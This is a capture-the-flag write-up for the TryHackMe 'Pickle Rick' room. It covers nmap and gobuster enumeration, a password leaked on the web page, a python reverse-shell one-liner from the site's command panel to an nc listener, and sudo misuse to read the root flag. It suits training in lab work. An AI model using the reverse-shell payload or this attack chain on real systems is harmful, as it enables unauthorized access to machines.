TryHackMe: Pickle Rick
Pickle Rick was a great room to get started in applying my skills, it felt good yet easy but very fun. I did over complicate it a little bit but ended up learning more and more. Overall was great and i recommend it if you are starting out.
https://tryhackme.com/r/room/picklerick
Initial Enumeration
Nmap Scan
I start by scanning the machine IP with nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T5 -sV -sS -Pn -p- 10.10.174.119
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 22:29 WET
Nmap scan report for 10.10.174.119
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.85 seconds
General use of nmap would be
nmap -T4 -n -sC -sV -Pn -p- [MACHINE_IP]ornmap -T4 -p- -A [MACHINE_IP], just took a different approach based on room requirements and to test and learn different scans.
Web 80
The scan didn’t gave me anything that catches the eye so i proceed to the web page:
No visible buttons nor links so the only valid option would be to check the page source:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
<style>
.jumbotron {
background-image: url("assets/rickandmorty.jpeg");
background-size: cover;
height: 340px;
}
</style>
</head>
<body>
<div class="container">
<div class="jumbotron"></div>
<h1>Help Morty!</h1></br>
<p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
<p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
</div>
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
</body>
</html>
Gobuster Scan
I find an username that i’m going to use to log into rick’s computers, but first need to find where. I checked ssh at first but no success and then went to use gobuster:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".html,.txt,.php" -t 25 --timeout 20s -u http://10.10.174.119:80
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.174.119:80
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/assets (Status: 301) [Size: 315] [--> http://10.10.174.119/assets/]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/server-status (Status: 403) [Size: 278]
/clue.txt (Status: 200) [Size: 54]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
Gobuster gave me 3 new directories: login.php, robots.txt and clue.txt (the ones that returned 200, meaning they are ok for me to look at). I start by looking up the text files only to find a random word and a clue that doesn’t give me much right now:
After that i went to login.php and found a login form, the place where i’m meant to log into rick’s computer:
Based on what i found so far i decided to try logging in with the robots.txt as the password, and lucky enough we are in:
Reverse Shell
Inside the portal.php the only page i can access is the command panel, where i can execute commands such as ls, whoami, etc.. Since there’s a shell i decided to try and reverse it so i could have better control over it, and the first step of doing it is starting a listener:
1
nc -lvnp 4444
After that i tried using bash first but no success and then used python and worked:
1
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("[REDACTED]",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
1
2
3
4
5
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [REDACTED] from (UNKNOWN) [10.10.174.119] 47380
www-data@ip-10-10-174-119:/var/www/html$
Now that i have better control i started by doing a simple ls:
1
2
3
4
5
6
7
8
9
10
www-data@ip-10-10-174-119:/var/www/html$ ls
Sup3rS3cretPickl3Ingred.txt
clue.txt
find
login.php
robots.txt
assets
denied.php
index.html
portal.php
Obtaining the Ingredients
Ingredient #1
I got a similar result to the gobuster enumeration but one particular file stands out from the others, Sup3rS3cretPickl3Ingred.txt, and reading the file gives us the first ingredient:
1
2
www-data@ip-10-10-174-119:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
[REDACTED]
Ingredient #2
Next up i look inside the home directory and find rick’s home folder with a text file inside called ‘second ingredients’, that when read gave me the second ingredient:
1
2
www-data@ip-10-10-174-119:/home/rick$ cat 'second ingredients'
[REDACTED]
For the last ingredient i went to look for inside the root file since its the most common place that came to mind for me, at first doing ls root didn’t work because of permissions so i decided to do sudo -l to check where i could use sudo:
1
2
3
4
5
6
7
www-data@ip-10-10-174-119:/$ sudo -l
Matching Defaults entries for www-data on ip-10-10-174-119:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-10-10-174-119:
(ALL) NOPASSWD: ALL
And for my luck i do have sudo permissions for every command, so a simple sudo ls root will work just fine. With that i find a text file called 3rd.txt inside /root/:
1
2
www-data@ip-10-10-174-119:/$ sudo ls root
3rd.txt snap
Ingredient #3
So, finally, to get the third and last ingredient i just gotta run sudo cat /root/3rd.txt :
1
2
www-data@ip-10-10-174-119:/$ sudo cat /root/3rd.txt
3rd ingredients: [REDACTED]